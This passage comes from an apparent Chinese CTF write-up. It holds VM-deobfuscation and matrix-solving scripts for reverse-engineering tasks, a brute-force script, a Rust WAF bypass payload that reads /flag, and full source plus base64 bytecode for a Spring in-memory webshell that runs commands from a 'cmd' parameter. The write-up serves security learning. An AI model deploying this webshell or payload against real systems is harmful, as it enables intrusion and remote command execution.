case _:
print(opcode)
print()
vm_parse()
用正则替换优化伪代码
import re
baby = [
["""read_x86reg\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: add8\(\);
L.{4}: push_imm2\((.*)\);
L.{4}: add8\(\);""", 'push(\g<1>+\g<2>+\g<3>);'],
["""read_x86reg\((.*)\);
L.{4}: push_imm2\((.*)\);
L.{4}: add8\(\);""",
'push(\g<1>+\g<2>);'],
["""read_x86reg\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: add8\(\);""",
'push(\g<1>+\g<2>);'],
["""read_x86reg\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: sub8\(\);""",
'push(\g<1>-\g<2>);'],
["""push\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: sub8\(\);""",
'push((\g<1>)-\g<2>);'],
["""push\((.*)\);
L.{4}: push_imm2\((.*)\);
L.{4}: sub8\(\);""",
'push((\g<1>)-\g<2>);'],
["""read_x86reg\((.*)\);
L.{4}: push\((.*)\);
L.{4}: add8\(\);""",
'push(\g<1>+(\g<2>));'],
["""push\((.*)\);
L.{4}: push\((.*)\);
L.{4}: add8\(\);""",
'push((\g<1>)+(\g<2>));'],
["""read_x86reg\((.*)\);
L.{4}: push_imm4\((.*)\);
L.{4}: and8\(\);""",
'push(\g<1>&\g<2>);'],
["""push\((.*)\);
L.{4}: push\((.*)\);
L.{4}: mul4\(\);""",
'push((\g<1>)*(\g<2>));'],
["""push\((.*)\);
L.{4}: push_imm1\(0x4\);
L.{4}: load\(\);""",
'push(load_dword(\g<1>));'],
["""push\((.*)\);
L.{4}: push_imm1\(0x8\);
L.{4}: load\(\);""",
'push(load_qword(\g<1>));'],
["""push\((.*)\);
L.{4}: push_imm1\(0x8\);
L.{4}: read_x86reg\((.*)\);
L.{4}: memcpy\(\);""",
'write8(\g<1>, \g<2>);'],
["""push\((.*)\);
L.{4}: push_imm1\(0x4\);
L.{4}: push_imm1\((.*)\);
L.{4}: memcpy\(\);""",
'write4(\g<1>, \g<2>);'],
["""push\((.*)\);
L.{4}: push_imm1\(0x4\);
L.{4}: push\((.*)\);
L.{4}: memcpy\(\);""",
'write4(\g<1>, \g<2>);'],
["""push\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: add4\(\);""",
'push((\g<1>)+\g<2>);'],
["""push\((.*)\);
L.{4}: push\((.*)\);
L.{4}: add4\(\);""",
'push((\g<1>)+(\g<2>));'],
["""push\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: shl8\(\);""",
'push(((\g<1>)<<\g<2>));'],
["""push\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
'\g<2> = \g<1>;'],
["""read_x86reg\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
'\g<2> = \g<1>;'],
["""push_imm1\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
'\g<2> = \g<1>;'],
["""push_imm2\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
'\g<2> = \g<1>;'],
["""push_imm4\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
'\g<2> = \g<1>;'],
["""push_reg4\((.*)\);
L.{4}: write_x86reg\((.*)\);""",
'\g<2> = \g<1>;'],
["""push\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: add8\(\);""",
'push((\g<1>)+\g<2>);'],
["""r17 = .*;
L.{4}: r18 = .*;
L.{4}: r19 = .*;
L.{4}: """,
''],
["""rax = .*;
L.{4}: """,
''],
["""rdx = .*;
L.{4}: """,
''],
["""rcx = .*;
L.{4}: """,
''],
["""rip = .*;
L.{4}: """,
''],
["""push\((.*)\);
L.{4}: push\((.*)\);
L.{4}: xf = cmp\d\((.*)\);""",
'xf = (\g<1>) \g<3> (\g<2>);'],
["""push\((.*)\);
L.{4}: push_imm1\((.*)\);
L.{4}: xf = cmp\d\((.*)\);""",
'xf = (\g<1>) \g<3> (\g<2>);'],
["""push_imm4\((.*)\);
L.{4}: goto_fixme (L.{4});""",
'goto \g<2>;'],
["""push_imm4\((.*)\);
L.{4}: if \(xf\) goto_fixme (L.{4});""",
'if (xf) goto \g<2>;'],
["""L.{4}: nop\(\);
""",
''],
["""push\(.*\);
L.{4}: tmp_\d+ = pop_reg4\(\);
L.{4}: """,
''],
]
# 0x2384 v0
# 0x2388 v1
# 0x238c v2
# 0x2390 v3
# 0x2394 v4
# 0x2398 v5
# 0x239c v6
# 0x23b0 v7 qword
# 0x23b8 v8 qword
# 0x23c0 v9
# 0x23c8 v10
baby2 = [
["""write4\(rsp\+0x80""", 'write4(rbp'],
["""write8\(rsp\+0x80""", 'write8(rbp'],
["""load_dword\(rsp\+0x80""", 'load_dword(rbp'],
["""load_qword\(rsp\+0x80""", 'load_qword(rbp'],
["""write4\(rbp\+0x2384, (.*)\);""", 'v0 = \g<1>;'],
["""write4\(rbp\+0x2388, (.*)\);""", 'v1 = \g<1>;'],
["""write4\(rbp\+0x238c, (.*)\);""", 'v2 = \g<1>;'],
["""write4\(rbp\+0x2390, (.*)\);""", 'v3 = \g<1>;'],
["""write4\(rbp\+0x2394, (.*)\);""", 'v4 = \g<1>;'],
["""write4\(rbp\+0x2398, (.*)\);""", 'v5 = \g<1>;'],
["""write4\(rbp\+0x239c, (.*)\);""", 'v6 = \g<1>;'],
["""write8\(rbp\+0x23b0, (.*)\);""", 'v7 = \g<1>;'],
["""write8\(rbp\+0x23b8, (.*)\);""", 'v8 = \g<1>;'],
["""write4\(rbp\+0x23c0, (.*)\);""", 'v9 = \g<1>;'],
["""write4\(rbp\+0x23c8, (.*)\);""", 'v10 = \g<1>;'],
["""load_dword\(rbp\+0x2384\)""", 'v0'],
["""load_dword\(rbp\+0x2388\)""", 'v1'],
["""load_dword\(rbp\+0x238c\)""", 'v2'],
["""load_dword\(rbp\+0x2390\)""", 'v3'],
["""load_dword\(rbp\+0x2394\)""", 'v4'],
["""load_dword\(rbp\+0x2398\)""", 'v5'],
["""load_dword\(rbp\+0x239c\)""", 'v6'],
["""load_qword\(rbp\+0x23b0\)""", 'v7'],
["""load_qword\(rbp\+0x23b8\)""", 'v8'],
["""load_dword\(rbp\+0x23c0\)""", 'v9'],
["""load_dword\(rbp\+0x23c8\)""", 'v10'],
# ['\((v\d+)\)', '\g<1>'],
]
def do_opt():
code = open('vm.txt').read()
while True:
h1 = hash(code)
for exp, rep in baby:
code = re.sub(exp, rep, code)
if h1 == hash(code):
break
while True:
h1 = hash(code)
for exp, rep in baby2:
code = re.sub(exp, rep, code)
if h1 == hash(code):
break
open('vm_opt.txt', 'w').write(code)
do_opt()
优化后的伪代码
L0000: write8(rsp-0x8, rbp);
L000A: rsp = (rsp-0x8)-0x2420;
L0015: rbp = rsp+0x80;
L001C: matrix = rcx;
L002A: key = rdx;
L0038: v9 = r8&0xffffffff;
L004C: v10 = r9&0xffffffff;
L0060: xf = (v10) <= (v9);
L00A8: if (xf) goto L00B4;
L00AE: goto L087A;
L00B4: xf = v9 <= 0x30;
L00D4: if (xf) goto L00E0;
L00DA: goto L087A;
L00E0: v6 = 0x0;
L00EB: goto L0639;
L00F1: v5 = 0x0;
L00FC: goto L05C2;
L0102: v4 = 0x0;
L010D: v3 = 0x0;
L011F: goto L04C3;
L0125: v2 = 0x0;
L0130: goto L044C;
L0136: xf = (v3+v6) < v9;
L0198: if (xf) goto L01A4;
L019E: goto L041A;
L01A4: xf = ((v2)+(v5)) < (v9);
L0206: if (xf) goto L0212;
L020C: goto L041A;
L0212: v4 +=
(load_dword(matrix+(((v2+((v9*(v3+v6))+v5))<<0x2))))*(load_dword(key+((((v2)+(v10*v3))
<<0x2))));
L0408: goto L041A;
L041A: v2 = v2+0x1;
L043A: goto L044C;
L044C: xf = v2 < v10;
L0485: if (xf) goto L0136;
L048B: goto L0491;
L0491: v3 += 0x1;
L04B1: goto L04C3;
L04C3: xf = (v3) < (v10);
L04FC: if (xf) goto L0125;
L0502: goto L0508;
L0508: write4((rbp+(((((((v6<<0x1))+v6)<<0x4))+v5)<<0x2))-0x80, v4);
L0589: v5 += 0x1;
L05B0: goto L05C2;
L05C2: xf = (v5) < (v9);
L05FB: if (xf) goto L0102;
L0601: goto L0607;
L0607: v6 = (v6)+0x1;
L0627: goto L0639;
L0639: xf = (v6) < (v9);
L0672: if (xf) goto L00F1;
L0678: goto L067E;
L067E: v1 = 0x0;
L0689: goto L0835;
L068F: v0 = 0x0;
L069A: goto L07BE;
L06A0: r8 = v0;
L06DC: write4(((v0+v9*v1)<<0x2)+matrix,
load_dword((rbp+(((((v1<<0x1)+v1)<<0x4)+v0)<<0x2))-0x80));
L0785: v0 = (v0)+0x1;
L07AC: goto L07BE;
L07BE: xf = (v0) < (v9);
L07F7: if (xf) goto L06A0;
L07FD: goto L0803;
L0803: v1 = (v1)+0x1;
L0823: goto L0835;
L0835: xf = (v1) < (v9);
L086E: if (xf) goto L068F;
L0874: goto L087A;
L087A: rbp = load_qword(rsp+0x2420);
L0892: rsp = ((rsp+0x2420)+0x8)+0x8;
L08A7: exit();
用 py 重写算法并解密矩阵
import pprint
from claripy import *
key_matrix = [
[0x000000DE, 0x000000ED, 0x000000BE],
[0x000000FE, 0x00000011, 0x000000F3],
[0x0000003C, 0x000000F9, 0x000000FE],
]
v9 = 6
v10 = 3
matrix = [
[BVS('', 32) for _ in range(6)],
[BVS('', 32) for _ in range(6)],
[BVS('', 32) for _ in range(6)],
[BVS('', 32) for _ in range(6)],
[BVS('', 32) for _ in range(6)],
[BVS('', 32) for _ in range(6)],
]
matrix_orig = []
for i in range(6):
matrix_orig.append(matrix[:])
solve = Solver()
for i in range(6):
for j in range(6):
solve.add(
Or(
And(matrix[j] >= ord('0'), matrix[j] <= ord('9')),
And(matrix[j] >= ord('a'), matrix[j] <= ord('f')),
And(matrix[j] >= ord('A'), matrix[j] <= ord('F')),
))
enc_matrix = [
[0x00020B3D, 0x0001920F, 0x00020705, 0x0001C46F, 0x00015EB7, 0x000079D8],
[0x0001E5D1, 0x0001A563, 0x0001E591, 0x0001E7E7, 0x00010E43, 0x00009C3A],
[0x0001E8EF, 0x0001C8E6, 0x0001C9F5, 0x0001BC1F, 0x00013C14, 0x000098A6],
[0x0001E90E, 0x0001C672, 0x0001E866, 0x000196B7, 0x0001307D, 0x00006C1A],
[0x000166CF, 0x0001400F, 0x00013D7E, 0x00011D1F, 0x0000BE1D, 0x00006012],
[0x0000AA6D, 0x00008490, 0x000088E6, 0x000088E6, 0x000060D2, 0x00002ED4]]
if v10 <= v9 and v9 <= 0x30:
for v6 in range(v9):
for v5 in range(v9):
v4 = 0
for v3 in range(v10):
for v2 in range(v10):
if v3+v6 < v9 and v2+v5 < v9:
v4 += matrix[v3+v6][v2+v5]*key_matrix[v3][v2]
matrix[v6][v5] = v4
for i in range(6):
for j in range(6):
solve.add(matrix[j] == enc_matrix[j])
mat = []
for i in range(6):
for j in range(6):
mat.append(matrix_orig[j])
for x in solve.batch_eval(mat, 10):
print(bytes(x))
# b'c9d0d8b8f8b216119ead79c61da6e1b16666'
machine
go 编写的 vm 赛题,手动翻译成 py 脚本以便于调试
vm 反编译的伪代码太长了看不懂,尝试动调找规律
输入 b'\x00'*50,断在 check 指令处能看到部分明文 flag,反复操作几次后就能得到完整 flag
import struct
pc = 0
code = open('./code.dat', 'rb').read()
def fetch8():
global pc
v = struct.unpack_from('<Q', code, pc)[0]
pc += 8
return v
def vm_exec():
global pc
pc = 0
vm_stack = []
vm_regs = [0]*8
# 734f1698
# flag = b'734f1698'+b'a5775ec2'+b'6cd2e11e'+b'd4791e77'+bytes.fromhex('0d0a')
flag = b'\x00'*50
flag_index = 0
while pc < len(code):
# print(f'{pc//8:04X} ', end='')
opcode = fetch8()
# print(f'{opcode:02X} ', end='')
match opcode:
case 0:
op = fetch8()
# print(f"push({op})", end='')
vm_stack.append(op)
case 1:
op = fetch8()
# print(f"push(r{op})", end='')
vm_stack.append(vm_regs[op])
case 2:
op = fetch8()
# print(f"r{op} = pop()", end='')
vm_regs[op] = vm_stack.pop(-1)
case 3:
# print(f"push(pop()+pop())", end='')
op1 = vm_stack.pop(-1)
op2 = vm_stack.pop(-1)
vm_stack.append((op1+op2)&0xFFFFFFFFFFFFFFFF)
case 5:
# print(f"push(pop()*pop())", end='')
op1 = vm_stack.pop(-1)
op2 = vm_stack.pop(-1)
vm_stack.append((op1*op2)&0xFFFFFFFFFFFFFFFF)
case 7:
# print(f'push(pop()^pop())', end='')
op1 = vm_stack.pop(-1)
op2 = vm_stack.pop(-1)
vm_stack.append((op1 ^ op2)&0xFFFFFFFFFFFFFFFF)
case 8:
# print(f'push(pop()<<pop())', end='')
op1 = vm_stack.pop(-1)
op2 = vm_stack.pop(-1)
vm_stack.append((op1 << op2)&0xFFFFFFFFFFFFFFFF)
case 9:
# print(f'push(pop()>>pop())', end='')
op1 = vm_stack.pop(-1)
op2 = vm_stack.pop(-1)
vm_stack.append(op1 >> op2)
case 10:
# print(f"push(~pop())", end='')
op1 = vm_stack.pop(-1)
vm_stack.append((~op1)&0xFFFFFFFFFFFFFFFF)
case 11:
# print(f"push(pop()&pop())", end='')
op1 = vm_stack.pop(-1)
op2 = vm_stack.pop(-1)
vm_stack.append(op1 & op2)
case 12:
# print(f"push(read(1))", end='')
vm_stack.append(flag[flag_index])
flag_index += 1
case 13:
ch = fetch8()
# print(f"write('{chr(ch)}')", end='')
case 14:
# print(f"check(pop() == 0)", end='')
tmp = vm_stack.pop(-1)
if tmp != 0:
print(f'{pc//8:04X} ')
print(bytes.fromhex(f'{tmp:016X}'))
print()
exit(0)
case _:
print(opcode)
print(flag)
vm_exec()
rocket
跟着官网的反编译文档操作,但是反编译失败
手动测试几组加密数据,发现明文和密文头部存在某些规律,尝试黑盒爆破
import os
import string
from libnum import s2b, n2s
from itertools import product
def enc(flag):
try:
os.unlink('output')
except:
pass
# open('flag.txt', 'wb').write(flag.encode())
# os.system(f'cat flag.txt | ./chall > /dev/null')
os.system(f'echo {flag} | ./chall > /dev/null')
try:
n = n2s(int(open('output').read()))
except:
n = b''
return n
enc_flag =
n2s(721227280401354339100842183245741822354476548976404217113598256921137
7620290274828526744558976950004052088838419495093523281490171119109149692
3437536625214832097586215227372220242219941570926244273430571431794896089
42837157528031299236230089474932932551406181)
def dfs(knowns):
if len(knowns) >= len(enc_flag)//3:
return
for ch in product(string.ascii_lowercase+string.digits+'{}_?', repeat=1):
flag = knowns+''.join(ch)
print('\r'+flag, end='')
tmp = enc(flag)
if tmp == enc_flag:
print('\ngot it')
exit(0)
if tmp and (tmp[len(flag)-1] & 0xf8) == (enc_flag[len(flag)-1] & 0xf8):
if tmp[0:len(flag)-1] == enc_flag[0:len(flag)-1]:
dfs(flag)
elif tmp[0:len(flag)-2] != enc_flag[0:len(flag)-2]:
break
# ctf{th1s_is_re4lly_beaut1fly_r1ght?}
# dfs('ctf{th')
dfs('')
web
RustWaf
main.rs
use std::env;
use serde::{Deserialize, Serialize};
use serde_json::Value;
static BLACK_PROPERTY: &str = "protocol";
#[derive(Debug, Serialize, Deserialize)]
struct File{
#[serde(default = "default_protocol")]
pub protocol: String,
pub href: String,
pub origin: String,
pub pathname: String,
pub hostname:String
}
pub fn default_protocol() -> String {
"http".to_string()
}
//protocol is default value,can't be customized
pub fn waf(body: &str) -> String {
if body.to_lowercase().contains("flag") || body.to_lowercase().contains("proc"){
return String::from("./main.rs");
}
if let Ok(json_body) = serde_json::from_str::<Value>(body) {
if let Some(json_body_obj) = json_body.as_object() {
if json_body_obj.keys().any(|key| key == BLACK_PROPERTY) {
return String::from("./main.rs");
}
}
//not contains protocol,check if struct is File
if let Ok(file) = serde_json::from_str::<File>(body) {
return serde_json::to_string(&file).unwrap_or(String::from("./main.rs"));
}
} else{
//body not json
return String::from(body);
}
return String::from("./main.rs");
}
fn main() {
let args: Vec<String> = env::args().collect();
println!("{}", waf(&args[1]));
}
app.js
const express = require('express');
const app = express();
const bodyParser = require("body-parser")
const fs = require("fs")
app.use(bodyParser.text({type: '*/*'}));
const { execFileSync } = require('child_process');
app.post('/readfile', function (req, res) {
let body = req.body.toString();
let file_to_read = "app.js";
const file = execFileSync('/app/rust-waf', [body], {
encoding: 'utf-8'
}).trim();
try {
file_to_read = JSON.parse(file)
} catch (e){
file_to_read = file
}
let data = fs.readFileSync(file_to_read);
res.send(data.toString());
});
app.get('/', function (req, res) {
res.send('see `/src`');
});
app.get('/src', function (req, res) {
var data = fs.readFileSync('app.js');
res.send(data.toString());
});
app.listen(3000, function () {
console.log('start listening on port 3000');
});
一个 fs.readFileSync 的 trick,参考:https://brycec.me/posts/corctf_2022_challenges,然后
利用 rust 的解析差异
payload
[
"file:",
"a",
"a",
"/fl%61g",
""
]
ezjava
cc4 组件,而且反序列的点没有任何限制,直接反序列化打内存马
内存马:
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import
org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import
org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMappi
ng;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.lang.reflect.Method;
import java.util.Scanner;
public class poc_1 extends AbstractTranslet {
public poc_1() throws IOException, NoSuchMethodException {
WebApplicationContext context = (WebApplicationContext)
RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.
servlet.DispatcherServlet.CONTEXT",0);
RequestMappingHandlerMapping mappingHandlerMapping =
context.getBean(RequestMappingHandlerMapping.class);
Method method = poc_1.class.getMethod("test");
PatternsRequestCondition url = new PatternsRequestCondition("/shell");
RequestMethodsRequestCondition ms = new
RequestMethodsRequestCondition();
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null,
null);
poc_1 injectToController = new poc_1("xxx");
mappingHandlerMapping.registerMapping(info,injectToController,method);
}
public poc_1(String tmp){
}
public void test() throws Exception {
HttpServletRequest request = ((ServletRequestAttributes)
(RequestContextHolder.currentRequestAttributes())).getRequest();
HttpServletResponse response = ((ServletRequestAttributes)
(RequestContextHolder.currentRequestAttributes())).getResponse();
PrintWriter writer = response.getWriter();
String cmd = request.getParameter("cmd");
try{
String o = "";
ProcessBuilder p;
if (System.getProperty("os.name").toLowerCase().contains("win")) {
p = new ProcessBuilder(new String[]{"cmd.exe", "/c", cmd});
} else {
p = new ProcessBuilder(new String[]{"/bin/sh", "-c", cmd});
}
Scanner c = (new Scanner(p.start().getInputStream())).useDelimiter("\\\\A");
o = c.hasNext() ? c.next() : o;
c.close();
writer.write(o);
writer.flush();
writer.close();
} catch (Exception e) {
response.sendError(404);
}
}
public void transform(DOM document, SerializationHandler[] handlers) throws
TransletException {
}
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler
handler) throws TransletException {
}
public static void main(String[] args) throws Exception {
poc_1 t = new poc_1();
}
}
编译后进行 base64 编码,base64 如下
yv66vgAAADQA7QoAOQCACgCBAIIIAIMLAIQAhQcAhgcAhwsABQCIBwCJCABVBwCKCg
AKAIsHAIwHAI0IAI4KAAwAjwcAkAcAkQoAEACSBwCTCgATAJQIAJUKAAgAlgoABgCXBwC
YCgAYAJkKABgAmgsAmwCcCABjCwCdAJ4IAJ8IAKAKAKEAogoADQCjCACkCgANAKUHAK
YIAKcIAKgKACQAjwgAqQgAqgcAqwoAJACsCgCtAK4KACoArwgAsAoAKgCxCgAqALIKAC
oAswoAKgC0CgC1ALYKALUAtwoAtQC0BwC4CwCbALkKAAgAgAcAugEABjxpbml0PgEAA
ygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUB
AAR0aGlzAQAHTHBvY18xOwEAB2NvbnRleHQBADdMb3JnL3NwcmluZ2ZyYW1ld29yay93
ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQ7AQAVbWFwcGluZ0hhbmRsZXJ
NYXBwaW5nAQBUTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhv
ZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmc7AQAGbWV0aG9k
AQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAN1cmwBAEhMb3JnL3NwcmluZ2
ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1BhdHRlcm5zUmVxdWVzdE
NvbmRpdGlvbjsBAAJtcwEATkxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9j
b25kaXRpb24vUmVxdWVzdE1ldGhvZHNSZXF1ZXN0Q29uZGl0aW9uOwEABGluZm8BAD
9Mb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvbWV0aG9kL1JlcXVlc3RN
YXBwaW5nSW5mbzsBABJpbmplY3RUb0NvbnRyb2xsZXIBAApFeGNlcHRpb25zBwC7BwC8
AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQADdG1wAQASTGphdmEvbGFuZy9TdHJpb
mc7AQAQTWV0aG9kUGFyYW1ldGVycwEABHRlc3QBAAFwAQAaTGphdmEvbGFuZy9Qcm
9jZXNzQnVpbGRlcjsBAAFvAQABYwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAFlAQAVTGp
hdmEvbGFuZy9FeGNlcHRpb247AQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHA
vSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0c
C9IdHRwU2VydmxldFJlc3BvbnNlOwEABndyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVy
OwEAA2NtZAEADVN0YWNrTWFwVGFibGUHAIkHAL0HAL4HAL8HAI0HAKYHAKsHALgBA
Al0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2
x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy
aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaG
UveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3Vu
L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZ
XI7BwDAAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvR
E9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3
I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYW
xpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS9
4bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS
9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0a
W9uSGFuZGxlcjsBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBA
BNbTGphdmEvbGFuZy9TdHJpbmc7AQABdAEAClNvdXJjZUZpbGUBAApwb2NfMS5qYXZh
DAA6ADsHAMEMAMIAwwEAOW9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLnNlcnZsZXQuRG
lzcGF0Y2hlclNlcnZsZXQuQ09OVEVYVAcAxAwAxQDGAQA1b3JnL3NwcmluZ2ZyYW1ld29y
ay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQBAFJvcmcvc3ByaW5nZnJhb
WV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGlu
Z0hhbmRsZXJNYXBwaW5nDADHAMgBAAVwb2NfMQEAD2phdmEvbGFuZy9DbGFzcwwA
yQDKAQBGb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL
1BhdHRlcm5zUmVxdWVzdENvbmRpdGlvbgEAEGphdmEvbGFuZy9TdHJpbmcBAAYvc2hlb
GwMADoAegEATG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpd
Glvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb24BADVvcmcvc3ByaW5nZnJhbWV3
b3JrL3dlYi9iaW5kL2Fubm90YXRpb24vUmVxdWVzdE1ldGhvZAwAOgDLAQA9b3JnL3Nwc
mluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW
5mbwwAOgDMAQADeHh4DAA6AFEMAM0AzgEAQG9yZy9zcHJpbmdmcmFtZXdvcmsvd
2ViL2NvbnRleHQvcmVxdWVzdC9TZXJ2bGV0UmVxdWVzdEF0dHJpYnV0ZXMMAM8A0Aw
A0QDSBwC+DADTANQHAL0MANUA1gEAAAEAB29zLm5hbWUHANcMANgA1gwA2QDa
AQADd2luDADbANwBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBAAdjbWQuZXhlAQA
CL2MBAAcvYmluL3NoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwA3QDeBwDfDAD
gAOEMADoA4gEAA1xcQQwA4wDkDADlAOYMAOcA2gwA6AA7BwC/DADpAFEMAOoAO
wEAE2phdmEvbGFuZy9FeGNlcHRpb24MAOsA7AEAQGNvbS9zdW4vb3JnL2FwYWNoZS9
4YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABNqYXZh
L2lvL0lPRXhjZXB0aW9uAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgEAJWp
hdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2
h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBADljb20v
c3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRp
b24BADxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdENv
bnRleHRIb2xkZXIBABhjdXJyZW50UmVxdWVzdEF0dHJpYnV0ZXMBAD0oKUxvcmcvc3Bya
W5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXM7AQA5
b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ
1dGVzAQAMZ2V0QXR0cmlidXRlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0kpTGphdmEvbG
FuZy9PYmplY3Q7AQAHZ2V0QmVhbgEAJShMamF2YS9sYW5nL0NsYXNzOylMamF2YS9s
YW5nL09iamVjdDsBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZ
hL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQA7KFtMb3JnL3
NwcmluZ2ZyYW1ld29yay93ZWIvYmluZC9hbm5vdGF0aW9uL1JlcXVlc3RNZXRob2Q7KVYB
AfYoTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9QYXR
0ZXJuc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQv
bXZjL2NvbmRpdGlvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJp
bmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9QYXJhbXNSZXF1ZXN0Q2
9uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb2
4vSGVhZGVyc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3Nlcn
ZsZXQvbXZjL2NvbmRpdGlvbi9Db25zdW1lc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbm
dmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9Qcm9kdWNlc1JlcXVlc3RDb2
5kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvb
